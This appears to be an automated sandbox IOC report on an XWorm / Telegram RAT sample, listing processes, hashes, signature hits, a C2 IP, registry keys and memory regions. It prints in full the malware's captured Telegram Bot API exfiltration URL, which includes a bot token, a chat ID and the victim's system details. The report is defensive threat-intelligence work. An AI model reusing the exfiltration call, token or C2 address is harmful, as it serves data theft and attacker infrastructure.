Automated Malware Analysis IOC Report for

Processes

Path

Cmdline

Malicious

C:\Users\user\Desktop\2ehwX6LWt3.exe

"C:\Users\user\Desktop\2ehwX6LWt3.exe"

Details

Is windows:	false
Is dropped:	false
PID:	2656
Target ID:	1
Parent PID:	4004
Name:	2ehwX6LWt3.exe
Path:	C:\Users\user\Desktop\2ehwX6LWt3.exe
Commandline:	"C:\Users\user\Desktop\2ehwX6LWt3.exe"
Size:	76805
MD5:	FC95456F5963C777B21445A4B9855903
Time:	09:36:37
Date:	25/11/2024
Reason:	newprocess
Reputation:	low
Is admin:	true
Is elevated:	true
Modulebase:	0x820000
Modulesize:	106496
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Antivirus / Scanner detection for submitted sample	AV Detection
Multi AV Scanner detection for submitted file	AV Detection
Yara detected Telegram RAT	Stealing of Sensitive Information, Remote Access Functionality
Yara detected XWorm	Stealing of Sensitive Information, Remote Access Functionality
Machine Learning detection for sample	AV Detection
Sample uses string decryption to hide its real strings	AV Detection
Yara detected Generic Downloader	Networking
Queries the volume information (name, serial number etc) of a device	Language, Device and Operating System Detection	System Information Discovery
Sample file is different than original file name gathered from version info	System Summary
Uses 32bit PE files	Compliance, System Summary
PE file has an executable .text section and no other executable section	System Summary
Parts of this applications are using the .NET runtime (Probably coded in C#)	System Summary
Sample is known by Antivirus	System Summary
URLs found in memory or binary data	Networking
Contains modern PE file flags such as dynamic base (ASLR) or NX	Compliance, System Summary
PE file contains a COM descriptor data directory	System Summary

URLs

Name

Malicious

89.40.31.232

Details

Name:	89.40.31.232
TargetID:	0
From Memory:	false
Source:	config extractor

Signature Hits	Behavior Group	Mitre Attack
Found malware configuration	AV Detection
C2 URLs / IPs found in malware configuration	Networking	Application Layer Protocol
Sample uses string decryption to hide its real strings	AV Detection
Detected TCP or UDP traffic on non-standard ports	Networking	Non-Standard Port
Connects to IPs without corresponding DNS lookups	Networking

https://api.telegram.org/bot

unknown

http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

unknown

Details

Name:	http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
TargetID:	1
From Memory:	true
Current Path:	C:\Users\user\Desktop\2ehwX6LWt3.exe
Source:	2ehwX6LWt3.exe, 00000001.00000002.4661828510.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp
Reputation:	high

Signature Hits	Behavior Group	Mitre Attack
URLs found in memory or binary data	Networking

https://api.telegram.org/bot5630894183:AAFSNB69Q2a6dw-6XMnWlasTfT2befh82Rk/sendMessage?chat_id=793028759&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A76B6983BF380F8767E2E%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20Y5P36%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%2028Nov2024

149.154.167.220

Details

Name:	https://api.telegram.org/bot5630894183:AAFSNB69Q2a6dw-6XMnWlasTfT2befh82Rk/sendMessage?chat_id=793028759&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A76B6983BF380F8767E2E%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20Y5P36%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%2028Nov2024
IP:	149.154.167.220
TargetID:	1
From Memory:	false
Current Path:	C:\Users\user\Desktop\2ehwX6LWt3.exe
Source:	network
Reputation:	high

Signature Hits	Behavior Group	Mitre Attack
Suricata IDS alerts for network traffic	Networking
IP address seen in connection with other malware	Networking
Uses secure TLS version for HTTPS connections	Compliance, Networking

Domains

Name

Malicious

api.telegram.org

149.154.167.220

Details

Name:	api.telegram.org
IP:	149.154.167.220
TargetID:	-1
Active:	true
Reputation:	high

Signature Hits	Behavior Group	Mitre Attack
Suricata IDS alerts for network traffic	Networking
Uses the Telegram API (likely for C&C communication)	Networking	Web Service
HTTP GET or POST without a user agent	Networking
Downloads files from webservers via HTTP	Networking	Application Layer Protocol Non-Application Layer Protocol Ingress Tool Transfer
Performs DNS lookups	Networking	Application Layer Protocol Non-Application Layer Protocol
URLs found in memory or binary data	Networking
Uses secure TLS version for HTTPS connections	Compliance, Networking

fp2e7a.wpc.phicdn.net

192.229.221.95

IPs

Domain

Country

Malicious

89.40.31.232

unknown

Romania

Details

IP:	89.40.31.232
TargetID:	1
Current Path:	C:\Users\user\Desktop\2ehwX6LWt3.exe
Country:	Romania
Countrycode:	ROU
ASN number:	35512
ASN name:	TELEMEDIA-ASRO
Private:	false

Signature Hits	Behavior Group	Mitre Attack
Found malware configuration	AV Detection
C2 URLs / IPs found in malware configuration	Networking	Application Layer Protocol
Sample uses string decryption to hide its real strings	AV Detection
Detected TCP or UDP traffic on non-standard ports	Networking	Non-Standard Port
Connects to IPs without corresponding DNS lookups	Networking

149.154.167.220

api.telegram.org

United Kingdom

Details

IP:	149.154.167.220
TargetID:	1
Current Path:	C:\Users\user\Desktop\2ehwX6LWt3.exe
Country:	United Kingdom
Countrycode:	GBR
ASN number:	62041
ASN name:	TELEGRAMRU
Private:	false
Domain:	api.telegram.org

Signature Hits	Behavior Group	Mitre Attack
Suricata IDS alerts for network traffic	Networking
Uses secure TLS version for HTTPS connections	Compliance, Networking

Registry

Path

Value

Malicious

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\2ehwX6LWt3_RASAPI32

EnableFileTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\2ehwX6LWt3_RASAPI32

EnableAutoFileTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\2ehwX6LWt3_RASAPI32

EnableConsoleTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\2ehwX6LWt3_RASAPI32

FileTracingMask

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\2ehwX6LWt3_RASAPI32

ConsoleTracingMask

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\2ehwX6LWt3_RASAPI32

MaxFileSize

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\2ehwX6LWt3_RASAPI32

FileDirectory

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\2ehwX6LWt3_RASMANCS

EnableFileTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\2ehwX6LWt3_RASMANCS

EnableAutoFileTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\2ehwX6LWt3_RASMANCS

EnableConsoleTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\2ehwX6LWt3_RASMANCS

FileTracingMask

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\2ehwX6LWt3_RASMANCS

ConsoleTracingMask

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\2ehwX6LWt3_RASMANCS

MaxFileSize

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\2ehwX6LWt3_RASMANCS

FileDirectory

There are 4 hidden registries, click here to show them.

Memdumps

Base Address

Regiontype

Protect

Malicious

2BF1000

trusted library allocation

page read and write

822000

unkown

page readonly

7FFD34280000

trusted library allocation

page read and write

7FFD3412C000

trusted library allocation

page execute and read and write

1D02C000

stack

page read and write

7FFD340DD000

trusted library allocation

page execute and read and write

7FFD340D0000

trusted library allocation

page read and write

7FFD340FB000

trusted library allocation

page execute and read and write

C93000

trusted library allocation

page read and write

1C32E000

stack

page read and write

1B8A6000

heap

page read and write

1B5A0000

heap

page execute and read and write

1B7EC000

heap

page read and write

7FFD34180000

trusted library allocation

page read and write

7FFD340D3000

trusted library allocation

page execute and read and write

7FFD34270000

trusted library allocation

page read and write

7FFD34190000

trusted library allocation

page execute and read and write

9C0000

heap

page read and write

1B7A3000

stack

page read and write

1310000

heap

page read and write

CE1000

heap

page read and write

7FFD340E0000

trusted library allocation

page read and write

CAC000

heap

page read and write

1030000

heap

page read and write

7FFD341F0000

trusted library allocation

page execute and read and write

D0E000

heap

page read and write

7FFD340FD000

trusted library allocation

page execute and read and write

1C928000

stack

page read and write

1B8A8000

heap

page read and write

1035000

heap

page read and write

2BE0000

heap

page read and write

FA0000

heap

page read and write

1C72E000

stack

page read and write

971000

stack

page read and write

C80000

trusted library allocation

page read and write

820000

unkown

page readonly

1B7B0000

heap

page read and write

1315000

heap

page read and write

1B4FE000

stack

page read and write

C60000

trusted library allocation

page read and write

1C956000

heap

page read and write

7FF474210000

trusted library allocation

page execute and read and write

7FFD340F0000

trusted library allocation

page read and write

CA0000

heap

page read and write

820000

unkown

page readonly

2C55000

trusted library allocation

page read and write

1B7D2000

heap

page read and write

1C82A000

stack

page read and write

7FFD340ED000

trusted library allocation

page execute and read and write

1BCE0000

heap

page read and write

CCB000

heap

page read and write

113D000

stack

page read and write

1B87D000

heap

page read and write

7FFD34272000

trusted library allocation

page read and write

2BBE000

stack

page read and write

1B808000

heap

page read and write

1AF7C000

heap

page read and write

1BBAE000

stack

page read and write

1BAAD000

stack

page read and write

1B6A5000

stack

page read and write

1B17D000

stack

page read and write

1AC20000

trusted library allocation

page read and write

7FFD342A0000

trusted library allocation

page execute and read and write

1C930000

heap

page read and write

123C000

stack

page read and write

C00000

heap

page read and write

7FFD340E3000

trusted library allocation

page read and write

2D5E000

trusted library allocation

page read and write

7FFD34186000

trusted library allocation

page read and write

1CF2C000

stack

page read and write

C90000

trusted library allocation

page read and write

1300000

heap

page read and write

1CE2A000

stack

page read and write

D14000

heap

page read and write

CE3000

heap

page read and write

12DE000

stack

page read and write

2BD0000

heap

page execute and read and write

9D0000

heap

page read and write

CD3000

heap

page read and write

CA6000

heap

page read and write

7FFD34290000

trusted library allocation

page execute and read and write

7FFD3418C000

trusted library allocation

page execute and read and write

7FFD340D4000

trusted library allocation

page read and write

7FFD341B6000

trusted library allocation

page execute and read and write

12BF1000

trusted library allocation

page read and write

1BEEB000

stack

page read and write

836000

unkown

page readonly

7FFD340F4000

trusted library allocation

page read and write

1303000

heap

page read and write

C20000

heap

page read and write

1B9AE000

stack

page read and write

There are 81 hidden memdumps, click here to show them.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Report
2ehwX6LWt3.exe

Processes

URLs

Domains

IPs

Registry

Memdumps

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Report2ehwX6LWt3.exe

Processes

URLs

Domains

IPs

Registry

Memdumps

IOC Report
2ehwX6LWt3.exe